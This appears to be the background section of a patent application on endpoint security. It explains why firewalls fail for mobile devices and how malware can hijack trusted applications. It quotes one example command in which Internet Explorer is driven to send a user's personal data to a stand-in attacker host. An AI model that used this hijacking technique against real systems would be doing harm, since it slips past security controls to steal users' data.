                1. Field of the Invention        
The present invention relates generally to systems and methods for maintaining security of computer systems connected to one or more networks (Local Area Networks or Wide Area Networks) and, more particularly, to a system and methodology for providing indirect access control.
2. Description of the Background Art
The first computers were largely stand-alone units with no direct connection to other computers or computer networks. Data exchanges between computers were mainly accomplished by exchanging magnetic or optical media such as floppy disks. Over time, more and more computers were connected to each other using Local Area Networks or “LANs”. In both cases, maintaining security and controlling what information a computer user could access was relatively simple because the overall computing environment was limited and clearly defined.
In traditional computing networks, a desktop computer largely remained in a fixed location and was physically connected to a single local network (e.g., via Ethernet). More recently, however, an increasingly large number of business and individual users are using portable computing devices, such as laptop computers, that are moved frequently and that connect into more than one network. For example, many users now have laptop computers that can be connected to networks at home, at work, and in numerous other locations. Many users also have home computers that are remotely connected to various organizations from time to time through the Internet. The number of computing devices, and the number of networks that these devices connect to, has increased dramatically in recent years.
In addition, various different types of connections may be utilized to connect to these different networks. A dial-up modem may be used for remote access to an office network. Various types of wireless connectivity, including IEEE (Institute of Electrical and Electronics Engineers) 802.11 and Bluetooth, are also increasingly popular. Wireless networks often have a large number of different users. Moreover, connection to these networks is often very easy, as connection does not require a physical link. Wireless and other types of networks are frequently provided in cafes, airports, convention centers, and other public locations to enable mobile computer users to connect to the Internet. Increasingly, users are also using the Internet to remotely connect to a number of different systems and networks. Thus, it is becoming more common for users to connect to a number of different networks from time to time through a number of different means.
One of the implications of this increasing number of devices occasionally connected to different networks is that traditional corporate firewall technologies are no longer effective. Traditional firewall products guard a boundary (or gateway) between a local network, such as a corporate network, and a larger network, such as the Internet. These products primarily regulate traffic between physical networks by establishing and enforcing rules that regulate access based upon the protocol and type of access request, the source requesting access, the connection port to be accessed, and other factors. For example, a firewall may permit access to a particular computer using TCP/IP on TCP port 80, but deny remote access to other computers on the network. A firewall may also permit access from a specific IP address or range (or zone) of IP addresses, but deny access from other addresses. Different security rules may be defined for different zones of addresses. However, traditional firewall technology guarding a network boundary does not protect against traffic that does not traverse that boundary. It does not regulate traffic between two devices within the network or two devices outside the network. A corporate firewall provides some degree of protection when a device is connected to that particular corporate network, but it provides no protection when the device is connected to other networks.
One security measure that has been utilized by many users is to install a personal firewall (or end point security) product on a computer system to control traffic into and out of the system. An end point security product can regulate all traffic into and out of a particular computer. For example, an end point security product may permit specific applications to access the Internet while denying access to other applications on a user's computer. To a large extent, restricting access to “trusted” applications is generally an effective security method. However, there are cases in which an untrusted or malicious application may “hijack” the connection of a trusted application and cause the hijacked trusted application to perform unauthorized actions on its behalf, thereby circumventing current security mechanisms. For example, a malicious application could hijack Microsoft Internet Explorer to send personal information to an arbitrary destination with a command line similar to the following:    iexplore.exe    www.hackingyou.com/scripts/gotcha.dll?YourPersonalDataHere
Because Internet Explorer is normally a trusted application, this type of attack may not be detected by the user.
What is required is a security solution that loses the vulnerability that currently exists which allows an untrusted or malicious application to “hijack” a trusted application (e.g., by passing information on the command line). The solution should not only address the specific known issue involving exploitation of Internet Explorer, but should also provide a more general solution to the problem of an untrusted application gaining access through the use of a trusted application. The present invention provides a solution for these and other needs.